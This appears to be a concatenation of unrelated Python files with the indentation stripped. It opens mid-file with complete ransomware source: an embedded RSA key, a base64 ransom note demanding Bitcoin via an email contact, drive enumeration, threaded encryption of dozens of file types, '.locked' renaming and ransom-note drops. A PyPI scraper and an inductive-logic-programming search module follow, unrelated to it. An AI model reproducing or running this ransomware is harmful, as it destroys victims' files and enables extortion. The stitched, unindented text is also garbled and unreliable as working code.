MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAm6HVnUVQdGlC8RoOX0qG
3F2KwfL1RuEcWYlsqPcxyY+APHykuk636l/md2S9Qg1+GUlopJmB2V977M/bS+8K
jm2gR3p7gLVEDnqDoMwSwmUDhKo7sNTDF62U9zYnSIIb/Z3p/SWMI9NEOgVGTyPX
en3yhAT/qKH070njVzJclVaA7FU6Q/7Z5L5z0Zm1o+SBrqYXgFi1w8fo5TiKMAK5
gpRujBey7MpSEcIXOC4o6NZ0zajMF+ZWyIYgo3YMbEb/VJdAUgcCPUrIysMqnb2P
51D7XbXvJw716hJIiQGdxrsM2rXpb8Y44/smsExveyv6e8mj0Fcrg8cMjeqN5dRf
OwIDAQAB
-----END PUBLIC KEY-----'''
email = 'snipersr@india.com'
msg ="77u/RU5HTElTSDoNCiNXaGF0IGhhcHBlbmVkPw0KQUxMIHlvdXIgaW1wb3J0YW50IGZpbGVzKGRhdGFiYXNlLGRvY3VtZW50cyxpbWFnZXMsdmlkZW9zLG11c2ljLGV0Yy4paGF2ZSBiZWVuIGVuY3J5cHRlZCENCkFuZCBvbmx5IHdlIGNhbiBkZWNyeXB0IQ0KVG8gZGVjcnlwdCB5b3VyIGZpbGVzLHlvdSBuZWVkIHRvIGJ1eSB0aGUgZGVjcnlwdGlvbiBrZXkgZnJvbSB1cy4NCldlIGFyZSB0aGUgb25seSBvbmUgd2hvIGNhbiBkZWNyeXB0IHRoZSBmaWxlIGZvciB5b3UuDQoNCiNBdHRlbnRpb24hDQpUcnlpbmcgdG8gcmVpbnN0YWxsIHRoZSBzeXN0ZW0gYW5kIGRlY3J5cHRpbmcgdGhlIGZpbGUgd2l0aCBhIHRoaXJkLXBhcnR5IHRvb2wgd2lsbCByZXN1bHQNCmluIGZpbGUgY29ycnVwdGlvbix3aGljaCBtZWFucyBubyBvbmUgY2FuIGRlY3J5cHQgeW91ciBmaWxlLihpbmNsdWRpbmcgdXMpLA0KaWYgeW91IHN0aWxsIHRyeSB0byBkZWNyeXB0IHRoZSBmaWxlIHlvdXJzZWxmLHlvdSBkbyBzbyBhdCB5b3VyIG93biByaXNrIQ0KDQojVGVzdCBkZWNyeXB0aW9uIQ0KQXMgYSBwcm9vZix5b3UgY2FuIGVtYWlsIHVzIDMgZmlsZXMgdG8gZGVjcnlwdCwNCmFuZCB3ZSBzdGlsbCBzZW5kIHlvdSB0aGUgcmVjb3ZlcmVkIGZpbGVzIHRvIHByb3ZlIHRoYXQgd2UgY2FuIGRlY3J5cHQgeW91ciBmaWxlcy4NCg0KI0hvdyB0byBkZWNyeXB0Pw0KMS5CdXkgKDAuMikgQml0Y29pbi4NCjIuU2VuZCAoMC4yKSBCaXRjb2luIHRvIHRoZSBwYXltZW50IGFkZHJlc3MuDQozLkVtYWlsIHlvdXIgSUQgdG8gdXMsYWZ0ZXIgdmVyaWZpY2F0aW9uLHdlIHdpbGwgY3JlYXRlIGEgZGVjcnlwdGlvbiB0b29sIGZvciB5b3UuDQoNClJlbWVtYmVyLGJhZCB0aGluZ3MgaGF2ZSBoYXBwZW5lZCxub3cgbG9vayBhdCB5b3VyIGRldGVybWluYXRpb24gYW5kIGFjdGlvbiENCg0KWW91ciBJRDojdWlkDQpFLW1haWw6I2VtYWlsDQpQYXltZW50OiNhZGRyZXNzDQoNCg0K5Lit5paH77yaDQoj5Y+R55Sf5LqG5LuA5LmIPw0K5oKo5omA5pyJ55qE6YeN6KaB5paH5Lu277yI5pWw5o2u5bqT44CB5paH5qGj44CB5Zu+5YOP44CB6KeG6aKR44CB6Z+z5LmQ562J77yJ5bey6KKr5Yqg5a+G77yB5bm25LiU5Y+q5pyJ5oiR5Lus5omN6IO96Kej5a+G77yBDQoNCiPms6jmhI/kuovpobnvvIENCuWwneivlemHjeaWsOWuieijheezu+e7n+W5tuS9v+eUqOesrOS4ieaWueW3peWFt+ino+WvhuaWh+S7tuWwhuWvvOiHtOaWh+S7tuaNn+Wdj++8jOi/meaEj+WRs+edgOayoeacieS6uuWPr+S7peino+WvhuaCqOeahOaWh+S7tg0K77yI5YyF5ous5oiR5Lus77yJ77yM5aaC5p6c5oKo5LuN5bCd6K+V6Ieq6KGM6Kej5a+G5paH5Lu277yM5YiZ6ZyA6Ieq6KGM5om/5ouF6aOO6Zmp77yBDQoNCiPmtYvor5Xop6Plr4bvvIENCuS9nOS4uuivgeaYju+8jOaCqOWPr+S7pemAmui/h+eUteWtkOmCruS7tuWQkeaIkeS7rOWPkemAgTPkuKropoHop6Plr4bnmoTmlofku7bvvIzmiJHku6zkvJrlsIbmgaLlpI3lkI7nmoTmlofku7blj5HpgIHnu5nmgqjvvIwNCuS7peivgeaYjuaIkeS7rOWPr+S7peino+WvhuaCqOeahOaWh+S7tuOAgg0KDQoj5aaC5L2V6Kej5a+GDQoxLui0reS5sCAoMC4yKSDkuKrmr5TnibnluIENCjIu5bCGICgwLjIpIOS4qiDmr5TnibnluIHlj5HpgIHliLDku5jmrL7lnLDlnYANCjMu5bCG5oKo55qESUTpgJrov4fnlLXlrZDpgq7ku7blj5HpgIHnu5nmiJHku6zvvIznu4/moLjlrp7lkI7vvIzmiJHku6zlsIbkuLrmgqjliLbkvZzop6Plr4blt6XlhbcNCg0K6K+36K6w5L2P77yM5pyA5Z2P55qE5LqL5oOF5bey57uP5Y+R55Sf5LqG77yM546w5Zyo5bCx55yL5oKo55qE5Yaz5b+D5ZKM6KGM5Yqo5LqG77yBDQoNCuaCqOeahElE77yaI3VpZA0K6YKu566x5Zyw5Z2A77yaI2VtYWlsDQrku5jmrL7lnLDlnYDvvJojYWRkcmVzcw0K"
msg = b64decode(msg)
msg = msg.decode('utf-8')
msg = msg.replace("#email",email)
msg = msg.replace("#uid",uid)
msg = msg.replace('#address',address)
msg = msg.encode('utf-8')
def get_drives():
drives = []
bitmask = windll.kernel32.GetLogicalDrives()
letter = ord('A')
while bitmask > 0:
if bitmask & 1:
drives.append(chr(letter) + ':\\')
bitmask >>= 1
letter += 1
return drives
edisk = get_drives()
def rsa_long_encrypt(rsa_public_key, plantext):
length = len(plantext)
default_length = 245
pubobj = Cipher_pkcs1_v1_5.new(RSA.importKey(rsa_public_key))
if length < default_length:
return b64encode(pubobj.encrypt(plantext))
offset = 0
res = []
while length - offset > 0:
if length - offset > default_length:
res.append(pubobj.encrypt(plantext[offset:offset + default_length]))
else:
res.append(pubobj.encrypt(plantext[offset:]))
offset += default_length
byte_data = b''.join(res)
return b64encode(byte_data)
def efile(fname,msg,rsa_public_key):
fi, ext = path.splitext(fname)
ext = ext[1:]
ENCRYPTABLE_FILETYPES = [
# GENERAL FORMATS
"dat", "keychain", "sdf", "vcf","NDF","ndf","",
# IMAGE FORMATS
"jpg", "png", "tiff", "tif", "gif", "jpeg", "jif", "jfif", "jp2", "jpx", "j2k", "j2c", "fpx", "pcd", "bmp",
"svg",
"3dm", "3ds", "max", "obj", "dds", "psd", "tga", "thm", "tif", "tiff", "yuv", "ai", "eps", "ps", "svg", "indd",
"pct","pem","ldf","LDF","key","KEY","exe","dll","DLL",
# VIDEO FORMATS
"mp4", "avi", "mkv", "3g2", "3gp", "asf", "flv", "m4v", "mov", "mpg", "rm", "srt", "swf", "vob", "wmv",
"vep","pbb","zhc","zhl",
# DOCUMENT FORMATS
"doc","DOC", "docx","DOCX", "txt","TXT", "pdf","PDF", "log","LOG", "msg", "odt", "pages", "rtf", "tex", "wpd", "wps", "csv", "ged", "key",
"pps",
"ppt", "pptx", "xml", "json", "xlsx","XLSX", "xlsm", "xlsb","XLSB" ,"xls","XLS", "mht", "mhtml" ,"htm", "html","Html", "xltx", "prn",
"dif",
"slk", "xlam", "xla", "ods", "docm", "dotx", "dotm", "xps", "ics","md","part","chm","text","TEXT","config","CONFIG",
# SOUND FORMATS
"mp3", "aif", "iff", "m3u", "m4a", "mid", "mpa", "wav", "wma","jks","xsd","properties","policy","dwg","dwg",
"dwt","DWT","dws","DWS","dxf","fla","FLA","hpp","HPP","LRG",
# EXE AND PROGRAM FORMATS
"msi", "php", "apk", "app", "bat","BAT", "cgi", "com", "asp", "aspx", "cer", "cfm", "css", "htm", "Htm",
"js", "jsp", "rss", "xhtml", "c", "class", "cpp", "cs", "h", "pyc" , "py" , "java", "lua", "pl", "sh", "sln",
"swift" , "vb","VB","vcxproj","BAK","mf","MF","jar","com","net","NET","cmd","CMD",".bashrc","cnf","skp","myd","frm","MYI",
# GAME FILES
"dem", "gam", "nes", "rom", "sav","x3d","spi","ack","pak","lnk","md5","ins","war","reg","cab",
# COMPRESSION FORMATS
"tgz", "zip", "rar", "tar", "7z", "cbr", "deb", "gz", "pkg", "rpm", "zipx", "iso","z","vsdx","TMP","Lst",
# MISC
"ged", "accdb", "db", "dbf", "mdb", "sql", "fnt", "fon", "otf", "ttf", "cfg", "ini", "prf", "bak", "old", "tmp",
"torrent" , "rbk" ,"rep" , "dbb","mdf","MDF","wdb"]
if ext not in ENCRYPTABLE_FILETYPES:
return 0
lookm = fname + ".locked"
if path.isfile(lookm):
return 0
if "HOW_TO_BACK_FILES.txt" in fname:
return 0
if "sqlserver.lnk" in fname:
return 0
try:
fd = open(fname, "rb")
plantext = fd.read()
fd.close()
fd = open(fname, "wb")
plantext = rsa_long_encrypt(rsa_public_key, plantext)
fd.write(plantext)
fd.close()
rename(fname,fname+'.locked')
except:
pass
def estart(drive, msg,rsa_public_key):
for p, d, f in walk(drive,topdown=True):
for ff in f:
fname = path.join(p, ff)
ttt = Thread(target=efile, args=(fname, msg, rsa_public_key))
ttt.start()
infof = path.join(p, "HOW_TO_BACK_FILES.txt")
try:
myf = open(infof, "wb")
myf.write(msg)
myf.close()
except:
pass
return 0
edisk = get_drives()
for drive in edisk:
t = Thread(target=estart, args=(drive,msg,rsa_public_key))
t.start()
|
scraper.py
|
# -*- coding: utf-8 -*-
import zmq
from lxml import etree
from zmq.eventloop import ioloop
import time
import os
import functools
import urllib2
from StringIO import StringIO
import re
import sqlite3
# PyPI page related constants
PYPI_BASE_URL = "http://pypi.python.org%s"
pkg_list_url = PYPI_BASE_URL % r"/pypi?%3Aaction=index"
PKG_PATH = "//td/a"
# ZeroMQ setting
VENTILATOR_TARGET = "ipc://pypiv.ipc"
SINK_TARGET = "ipc://pypis.ipc"
INTERVAL = 0.1
# SQLite setting
SQLITE_STORE = "pypi.db"
INSERT_TEMPLATE = ("""insert into pypi values """ +
"""(':name', ':version', ':url')""")
def init():
if os.path.exists(SQLITE_STORE):
os.remove(SQLITE_STORE)
conn = sqlite3.connect(SQLITE_STORE)
cur = conn.cursor()
cur.execute( ("""create table pypi (""" +
"""name text, version text, url text)""") )
conn.commit()
conn.close()
def ventilator():
context = zmq.Context()
ventilator = context.socket(zmq.PUSH)
ventilator.bind(VENTILATOR_TARGET)
fp = urllib2.urlopen(pkg_list_url)
data = fp.read()
tree = etree.parse(StringIO(data), etree.HTMLParser())
pkgs = tree.xpath(PKG_PATH)
time.sleep(1.0)
for p in pkgs:
url = PYPI_BASE_URL % p.attrib['href']
print url
ventilator.send(url)
def worker():
context = zmq.Context()
receiver = context.socket(zmq.PULL)
receiver.connect(VENTILATOR_TARGET)
sender = context.socket(zmq.PUSH)
sender.connect(SINK_TARGET)
callback = functools.partial(pkg_url_handler, sender)
loop = ioloop.IOLoop.instance()
loop.add_handler(receiver, callback, zmq.POLLIN)
loop.start()
def sink():
context = zmq.Context()
sink = context.socket(zmq.PULL)
sink.bind(SINK_TARGET)
conn = sqlite3.connect(SQLITE_STORE)
cur = conn.cursor()
def pull_handler(socket, events):
message = socket.recv_pyobj()
sql = INSERT_TEMPLATE % message
print sql
cur.execute(sql)
def timeout_handler():
conn.commit()
conn.close
loop = ioloop.IOLoop.instance()
loop.add_handler(sink, pull_handler, zmq.POLLIN)
loop.add_timeout(5.0, timeout_handler)
loop.start()
def pkg_url_handler(sender, receiver, events):
pkg_url = receiver.recv()
p = urllib2.urlopen(pkg_url)
data = p.read()
pkginfo = parse_pkginfo(data)
sender.send_pyobj(pkginfo)
def __parse_helper(li):
strong = li.xpath('./strong')[0].text
span = li.xpath('./span')[0].text
strong.lower()[:-1]
def parse_pkginfo(source):
tree = etree.parse(StringIO(source), etree.HTMLParser())
# hard coding
title_tag = tree.xpath("//title")[0].text.split()
name = title_tag[:-1].join(' ')
version = title_tag[-1]
additional_path = "/pypi/%s/%s" % (name, version)
url = PYPI_BASE_URL % additional_path
ul = tree.xpath("//div[@id='content']/div[@class='section']/ul[@class='nodot']/li")
for li in ul:
return dict(name=name, version=version, url=url)
def main():
from multiprocessing import cpu_count, Process, Pool
max_process = 2 * cpu_count()
sinkp = Process(target=sink)
print "*** SINK START ***"
sinkp.start()
for i in range(max_process):
workerp = Process(target=worker)
print "*** WORKER %d START ***" % i
workerp.start()
ventilatorp = Process(target=ventilator)
print "*** VENTILATOR START"
ventilatorp.start()
ventilatorp.join()
sinkp.join()
if __name__ == '__main__':
import argparse
description = "PyPI data scraper"
parser = argparse.ArgumentParser(description=description)
parser.add_argument('type', choices='vwsim')
class Prog:
"""dummy class for namespace"""
pass
def exec_error():
print "to see usage, type --help"
prog = Prog()
parser.parse_args(namespace=prog)
process_type = {
'v': ventilator,
'w': worker,
's': sink,
'i': init,
'm': main
}
process = process_type.get(prog.type, exec_error)
process()
|
split.py
|
#!/usr/bin/env python3
import random
from popper.utils import Settings, Stats
from popper.aspsolver import Clingo
from popper.tester import Tester
from popper.constrain import Constrain, Outcome, Con
from popper.generate import generate_program
from popper.core import Clause, Literal, Grounding, Program
from datetime import datetime
import multiprocessing
import os
MIN_SIZE=2
MAX_SIZE=100
DEBUG=False
def prog_to_code(prog):
return [Clause.to_code(clause) for clause in prog]
def tmp():
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
return current_time
def ground_rules(grounder, max_clauses, max_vars, rules):
for (head, body) in rules:
# find bindings for variables in the constraint
assignments = grounder.find_bindings(head, body, max_clauses, max_vars)
# keep only standard literals
body = [literal for literal in body if isinstance(literal, Literal)]
# ground the clause for each variable assignment
for assignment in assignments:
yield Grounding.ground_rule(head, body, assignment)
def dbg(*args):
if DEBUG:
print(tmp(),*args)
def build_constraints(settings, stats, constrainer, tester, program, pos, neg):
# 3. Build constraints
rules = set()
if settings.functional_test and tester.is_non_functional(program.clauses):
for x in constrainer.generalisation_constraint(program):
rules.add(x)
for rule in tester.check_redundant_literal(program.clauses):
for x in constrainer.redundant_literal_constraint(rule):
rules.add(x)
# eliminate generalisations of programs that contain redundant clauses
if tester.check_redundant_clause(program.clauses):
for x in constrainer.generalisation_constraint(program):
rules.add(x)
if len(program.clauses) > 1:
# pass
# evaluate inconsistent sub-clauses
with stats.duration('test_individual_rules.is_inconsistent'):
for rule in program.clauses:
if rule.is_recursive():
continue
if tester.is_inconsistent(rule, neg):
for x in constrainer.generalisation_constraint(Program([rule])):
rules.add(x)
# eliminate totally incomplete rules
with stats.duration('test_individual_rules.is_totally_incomplete'):
if not any(rule.is_recursive() for rule in program.clauses):
for rule in program.clauses:
if tester.is_totally_incomplete(rule, pos):
for x in constrainer.redundancy_constraint(Program([rule])):
rules.add(x)
return rules
def pprint(program):
for clause in program.to_code():
dbg('\t' + clause)
# @profile
def popper(settings, stats, constrainer, grounder, tester, pos, neg, inc_rules, gen_rules, spec_rules, redundancy_rules, min_size, max_size):
solver = Clingo(settings.bias_file, settings.clingo_args)
all_rules = set()
all_rules.update(inc_rules)
all_rules.update(gen_rules)
all_rules.update(spec_rules)
all_rules.update(redundancy_rules)
if settings.constraints:
# add constraints we have already discovered
with stats.duration('add_old_rules'):
solver.add_ground_clauses(all_rules)
new_inc_rules = set()
new_gen_rules = set()
new_spec_rules = set()
new_redundacy_rules = set()
for size in range(min_size, max_size+1):
# if settings.debug:
dbg(f'{"*" * 20} MAX LITERALS: {size} {"*" * 20}')
solver.update_number_of_literals(size)
while True:
with stats.duration('generate'):
model = solver.get_model()
if not model:
break
program = generate_program(model)
stats.total_programs += 1
# 2. Test
# THIS CODE IS VERY EXPENSIVE
with stats.duration('test'):
(outcome, conf_matrix) = tester.test(program.clauses, pos, neg)
# (outcome, conf_matrix) = tester.test_old(program.clauses, pos, neg, test_all=False)
if settings.debug:
(tp, fn, tn, fp) = conf_matrix
dbg(f'Program {stats.total_programs}:')
pprint(program)
approx_pos = '+' if tp + fn < len(pos) else ''
approx_neg = '+' if tn + fp < len(neg) else ''
dbg(f'tp: {tp}{approx_pos}, fn: {fn}{approx_pos}, tn: {tn}{approx_neg}, fp: {fp}{approx_neg}')
if outcome == (Outcome.ALL, Outcome.NONE):
return (program.clauses, new_inc_rules, new_gen_rules, new_spec_rules, new_redundacy_rules)
with stats.duration('build_constraints'):
rules = build_constraints(settings, stats, constrainer, tester, program, pos, neg)
for rule in program.clauses:
rules.update(build_constraints(settings, stats, constrainer, tester, Program([rule], program.before), pos, neg))
# add other constraints
rules.update(constrainer.build_constraints(program, outcome))
# 4. Ground constraints
with stats.duration('ground'):
to_add = set()
for (rule_type, rule) in rules:
if settings.debug:
dbg('rule_type',rule_type)
Constrain.print_constraint(rule)
for ground_rule in set(ground_rules(grounder, solver.max_clauses, solver.max_vars, [rule])):
if ground_rule in all_rules:
continue
to_add.add(ground_rule)
if rule_type == 'INCLUSION':
# new_gen_rules.add(ground_rule)
# new_spec_rules.add(ground_rule)
# new_redundacy_rules.add(ground_rule)
new_inc_rules.add(ground_rule)
elif rule_type == Con.GENERALISATION:
new_gen_rules.add(ground_rule)
elif rule_type == Con.SPECIALISATION:
new_spec_rules.add(ground_rule)
elif rule_type == Con.REDUNDANCY:
new_redundacy_rules.add(ground_rule)
if outcome == (Outcome.ALL, Outcome.NONE):
return (program.clauses, new_inc_rules, new_gen_rules, new_spec_rules, new_redundacy_rules)
# 5. Add to the solver
with stats.duration('add'):
solver.add_ground_clauses(to_add)
return (None, new_inc_rules, new_gen_rules, new_spec_rules, new_redundacy_rules)
def num_literals(program):
size = 0
for rule in program:
size = size + len(rule.body) + 1
return size
def mdl(program, conf_matrix):
(tp, fn, tn, fp) = conf_matrix
size = num_literals(program)
num_errors = fn + fp
return size + (num_errors * 10)
def chunks(xs, size):
# SHUFFLE?
for i in range(0, len(xs), size):
yield xs[i:i+size]
def load_examples(settings):
pos = []
neg = []
with open(settings.ex_file) as f:
for line in f:
line = line.strip()
if line.startswith('pos'):
line = line[4:-2]
pos.append(line)
elif line.startswith('neg'):
line = line[4:-2]
neg.append(line)
return (pos, neg)
# THIS CODE IS FUCKING SHIT
# FUCK OFF PYTHON
def intersection(xs):
if not xs:
return set()
ys = xs[0]
for x in xs[1:]:
ys.intersection(x)
return ys
def hash_union(tester, progs):
union_hashes = set()
union = set()
for prog in progs:
for rule in prog:
k = rule.my_hash()
if k not in union_hashes:
union_hashes.add(k)
union.add(rule)
if tester.check_redundant_clause(union):
union = tester.reduce_program(union)
return frozenset(union)
def union_of_seen(tester, last_ex_prog, pos):
return hash_union(tester, (last_ex_prog[ex] for ex in pos))
def check_old_programs(constrainer, grounder, iteration_progs, min_chunk_prog_size, max_chunk_prog_size, tester, chunk_exs, inc_rules, gen_rules, spec_rules, redundancy_rules):
chunk_prog = None
# TODO: ORDER ITERATION_PROGS BY SIZE
# hist_redundancy = set()
# hist_specialisation = set()
new_rules = set()
for prog in iteration_progs:
k = num_literals(prog)
if k >= min_chunk_prog_size and k < max_chunk_prog_size:
(outcome, _conf_matrix) = tester.test(prog, chunk_exs, [])
(pos_outcome, _neg_outcome) = outcome
dbg(f'\t<OLD PROGRAM {k}>')
for clause in prog:
dbg('\t',clause.to_code())
dbg('\t' + str(pos_outcome))
dbg(f'\t</OLD PROGRAM {k}>')
if pos_outcome == Outcome.ALL:
# QUESTION: IF WE FIND AN EXISTING PROGRAM THAT WORKS, IS THERE ANY POINT LEARNING ANOTHER ONE, EVEN IF THE NEW ONE IS SMALLER?
# QUESTION: IF WE FIND AN EXISTING PROGRAM THAT WORKS, IS THERE ANY POINT LEARNING A SPECIALISATION OF IT?
# QUESTION: IF WE FIND AN EXISTING PROGRAM THAT WORKS, IS THERE ANY POINT LEARNING A SUBSET OF IT?
if DEBUG:
dbg(f'\treusing solution of size {k}')
max_chunk_prog_size = k
chunk_prog = prog
# for x in constrainer.specialisation_constraint(Program(prog)):
# new_rules.add(x)
elif pos_outcome == Outcome.NONE:
for x in constrainer.redundancy_constraint(Program(prog)):
new_rules.add(x)
elif pos_outcome == Outcome.SOME:
for x in constrainer.specialisation_constraint(Program(prog)):
new_rules.add(x)
new_inc_rules = set()
new_spec_rules = set()
new_redundacy_rules = set()
for (rule_type, rule) in new_rules:
for ground_rule in set(ground_rules(grounder, grounder.max_clauses, grounder.max_vars, [rule])):
if rule_type == 'INCLUSION':
new_inc_rules.add(ground_rule)
elif rule_type == Con.SPECIALISATION:
new_spec_rules.add(ground_rule)
elif rule_type == Con.REDUNDANCY:
new_redundacy_rules.add(ground_rule)
inc_rules.update(new_inc_rules)
for ex in chunk_exs:
spec_rules[ex].update(new_spec_rules)
redundancy_rules.update(new_redundacy_rules)
return (chunk_prog, max_chunk_prog_size)
def process_chunk(stats, settings, tester, constrainer, grounder, neg, inc_rules, gen_rules, spec_rules, redundancy_rules, iteration_progs, num_chunks, chunk_num, chunk_exs, last_ex_prog, min_prog_size, best_prog_size):
chunk_prog = None
dbg(f'chunk {chunk_num+1}/{num_chunks} - num examples: {len(chunk_exs)}')
# dbg(chunk_exs)
if all(last_ex_prog[x] != None for x in chunk_exs):
# with stats.duration('hash_union'):
chunk_prog = union_of_seen(tester, last_ex_prog, chunk_exs)
if DEBUG:
dbg('\t<best so far>')
for clause in chunk_prog:
dbg('\t' + clause.to_code())
dbg('\t</best so far>')
# min size for this chunk is the maximum size of the solutions for the smaller chunks
min_chunk_prog_size = max(min_prog_size[ex] for ex in chunk_exs)
# max size for this chunk is the size of the union of the solutions for the smaller chunks
max_chunk_prog_size = best_prog_size
if chunk_prog != None:
k = num_literals(chunk_prog)
if k < best_prog_size:
max_chunk_prog_size = k
improvement_possible = min_chunk_prog_size < max_chunk_prog_size
# if we cannot learn something smaller, then this chunk program is the union of all the solutions for the smaller chunks
if not improvement_possible:
if DEBUG:
dbg(f'\t skipping as min_chunk_prog_size ({min_chunk_prog_size}) >= max_chunk_prog_size ({max_chunk_prog_size})')
# chunk_prog = union_of_seen(tester, last_ex_prog, chunk_exs)
# for ex in chunk_exs:
# last_ex_prog[ex] = chunk_prog
if improvement_possible and settings.lazy:
with stats.duration('check_old_programs'):
# check whether any previous solution in this iteration covers this chunk.
(better_older_prog, max_chunk_prog_size) = check_old_programs(constrainer, grounder, iteration_progs, min_chunk_prog_size, max_chunk_prog_size, tester, chunk_exs, inc_rules, gen_rules, spec_rules, redundancy_rules)
if better_older_prog != None:
chunk_prog = better_older_prog
# if we can reuse one, then update the best solution for the examples
# for ex in chunk_exs:
# last_ex_prog[ex] = chunk_prog
# also update when an improvement is possible
improvement_possible = min_chunk_prog_size < max_chunk_prog_size
if settings.lazy:
improvement_possible = False
# TODO: IF WE KNOW SOMETHING IS COMPLETE, CAN WE RULE OUT SPECIALISATIONS?????
# TODO: ELIMINATE THE PREVIOUS H FROM THE SEARCH SPACE???
# build constraints for this chunk
# specialisation rules are example dependent
chunk_specialisation_rules = set(rule for ex in chunk_exs for rule in spec_rules[ex])
# redundancy rules only apply if they hold for all examples
chunk_redundancy_rules = intersection(list(redundancy_rules[ex] for ex in chunk_exs))
new_solution = None
if improvement_possible:
max_chunk_prog_size -= 1
# call popper with the chunk examples and chunk constraints
# receive the hypothesis, constraints, and conf_matrix for this chunk
if DEBUG:
dbg(f'\tchunk_search min:{min_chunk_prog_size} max:{max_chunk_prog_size}')
# (new_solution, new_gen_rules, new_spec_rules, new_redundacy_rules) = popper(settings, constrainer, tester, chunk_exs, neg, gen_rules, chunk_specialisation_rules, chunk_redundancy_rules, 0, max_chunk_prog_size)
(new_solution, new_inc_rules, new_gen_rules, new_spec_rules, new_redundacy_rules) = popper(settings, stats, constrainer, grounder, tester, chunk_exs, neg, inc_rules, gen_rules, chunk_specialisation_rules, chunk_redundancy_rules, min_chunk_prog_size, max_chunk_prog_size)
# if new_solution == None:
# print('FAIL'*10)
# print(chunk_exs)
# TODO: ADD EARLY PRUNING!!!???
if new_solution != None:
chunk_prog = frozenset(new_solution)
# update the inclusion rules
inc_rules.update(new_inc_rules)
# update the generalisation rules
gen_rules.update(new_gen_rules)
# update the specialisation and redundancy rules for each example
for ex in chunk_exs:
spec_rules[ex].update(new_spec_rules)
redundancy_rules[ex].update(new_redundacy_rules)
# TODO: IF WE SEARCH DEPTH K FOR A SOLUTION FOR A SPECIFIC EXAMPLE AND WE DO NOT FIND ONE, THEN THERE IS NO POINT SEARCH TO DEPTH K AGAIN
# AC: WHAT ABOUT THE PREVIOUS ITERATION PROG
# if there is a hypothesis, add it to the iteration hypothesis
if new_solution == None:
if DEBUG and chunk_prog != None:
dbg(f'\told program:')
for clause in chunk_prog:
dbg('\t' + clause.to_code())
else:
# AC: CHECK IF NEEDED
# chunk_prog = frozenset(chunk_prog)
if DEBUG and chunk_prog != None:
dbg(f'\tNEW PROGRAM:')
for clause in chunk_prog:
dbg('\t' + clause.to_code())
# remove redundant clauses
with stats.duration('check_redundant_clause'):
if chunk_prog:
if tester.check_redundant_clause(chunk_prog):
chunk_prog = frozenset(tester.reduce_program(chunk_prog))
return chunk_prog
def standard_popper(settings, stats, queue):
(pos, neg) = load_examples(settings)
constrainer = Constrain(settings)
tester = Tester(settings, pos, neg)
grounder = Clingo(settings.bias_file, settings.clingo_args)
(new_solution, _new_inc_rules, _new_gen_rules, _new_spec_rules, _new_redundacy_rules) = popper(settings, stats, constrainer, grounder, tester, pos, neg, set(), set(), set(), set(), MIN_SIZE, MAX_SIZE)
if new_solution != None:
queue['prog'] = new_solution
for x in new_solution:
dbg('\t'+ x.to_code())
def split_search(settings, stats, queue):
min_size, max_size = MIN_SIZE, MAX_SIZE
# best hypothesis and score seen so far
best_prog, best_prog_size, best_prog_errors = None, max_size, None
(pos, neg) = load_examples(settings)
random.shuffle(pos)
random.shuffle(neg)
constrainer = Constrain(settings)
tester = Tester(settings, pos, neg)
grounder = Clingo(settings.bias_file, settings.clingo_args)
# minimum size of program needed to cover each example
min_prog_size = {x:min_size for x in pos}
# the latest program that covers an example
last_ex_prog = {x:None for x in pos}
# all inclusion rules
inc_rules = set()
# all generalisation rules
gen_rules = set()
# specialisation rules for each example
spec_rules = {x:set() for x in pos}
# redundancy rules for each example
redundancy_rules = {x:set() for x in pos}
# size of the chunks/partitions of the examples
chunk_size = 1
# the initial partitions where each example has its own partition
all_chunks = [[x] for x in pos]
while True:
dbg('CHUNK_SIZE', chunk_size)
# AC: WE COULD MOVE THIS UP AND IT MIGHT SAVE US TIME!!!
iteration_progs = set()
# partition the positive examples in chunks of size chunk_size
these_chunks = list(chunks(all_chunks, chunk_size))
num_chunks = len(these_chunks)
for i, chunk_exs in enumerate(these_chunks):
# flatten the chunks
chunk_exs = [item for sublist in chunk_exs for item in sublist]
chunk_prog = process_chunk(stats, settings, tester, constrainer, grounder, neg, inc_rules, gen_rules, spec_rules, redundancy_rules, iteration_progs, num_chunks, i, chunk_exs, last_ex_prog, min_prog_size, best_prog_size)
if chunk_prog:
size = num_literals(chunk_prog)
for ex in chunk_exs:
min_prog_size[ex] = size
last_ex_prog[ex] = chunk_prog
iteration_progs.add(chunk_prog)
# build up the best_prog when best_prog == None
if best_prog == None:
queue['prog'] = hash_union(tester, iteration_progs)
# program for this chunk size is the union of the chunk progs
with stats.duration('hash_union'):
iteration_prog = hash_union(tester, iteration_progs)
iteration_prog_size = num_literals(iteration_prog)
# JUST TRYING SOMETHING NEW - THIS MIGHT WORK
# TRY EACH ITERATION PROG ON ALL THE EXAMPLES .....
# THIS IS AMAZING!!
for prog in iteration_progs:
k = num_literals(prog)
if k < iteration_prog_size:
(outcome, _conf_matrix) = tester.test(prog, pos, [])
(pos_outcome, _neg_outcome) = outcome
if pos_outcome == Outcome.ALL:
# print('WTF'*50)
iteration_prog = prog
iteration_prog_size = num_literals(prog)
for x in pos:
last_ex_prog[x] = iteration_prog
# AFTER GOING THROUGH ALL THE CHUNKS
if settings.chunking:
with stats.duration('chunking'):
tmp_chunks = {}
for ex in pos:
prog = last_ex_prog[ex]
if prog == None:
prog = frozenset()
if prog not in tmp_chunks:
tmp_chunks[prog] = set([ex])
else:
tmp_chunks[prog].add(ex)
new_chunk_pos = []
for k, v in tmp_chunks.items():
# print('CHUCKY')
# for x in k:
# dbg('\t'+ x.to_code())
new_chunk_pos.append(v)
# print('k',k)
# print('v',v)
all_chunks = new_chunk_pos
# NEW!!!!
# for chunk in all_chunks:
# _chunk_spec = set(rule for ex in chunk for rule in spec_rules[ex])
# _chunk_redundancy = intersection(list(redundancy_rules[ex] for ex in chunk))
# for ex in chunk:
# spec_rules[ex] = _chunk_spec
# redundancy_rules[ex] = _chunk_redundancy
# calculate the score of the hypothesis at this iteration against all examples
if iteration_prog_size == 0:
conf_matrix = (len(pos), 0, 0, (len(neg)))
else:
(_, conf_matrix) = tester.test(iteration_prog, pos, neg, test_all=True)
# iteration_prog_score = mdl(iteration_prog, conf_matrix)
(tp, fn, tn, fp) = conf_matrix
iteration_num_errors = fn + fp
if DEBUG:
dbg(f'CHUNK:{chunk_size} size:{iteration_prog_size} fn:{fn} fp:{fp}')
for clause in iteration_prog:
dbg('\t',clause.to_code())
if (best_prog is None) or (iteration_num_errors < best_prog_errors) or (iteration_num_errors == best_prog_errors and iteration_prog_size < best_prog_size):
best_prog = iteration_prog
best_prog_size = iteration_prog_size
best_prog_errors = iteration_num_errors
# queue.put(best_prog)
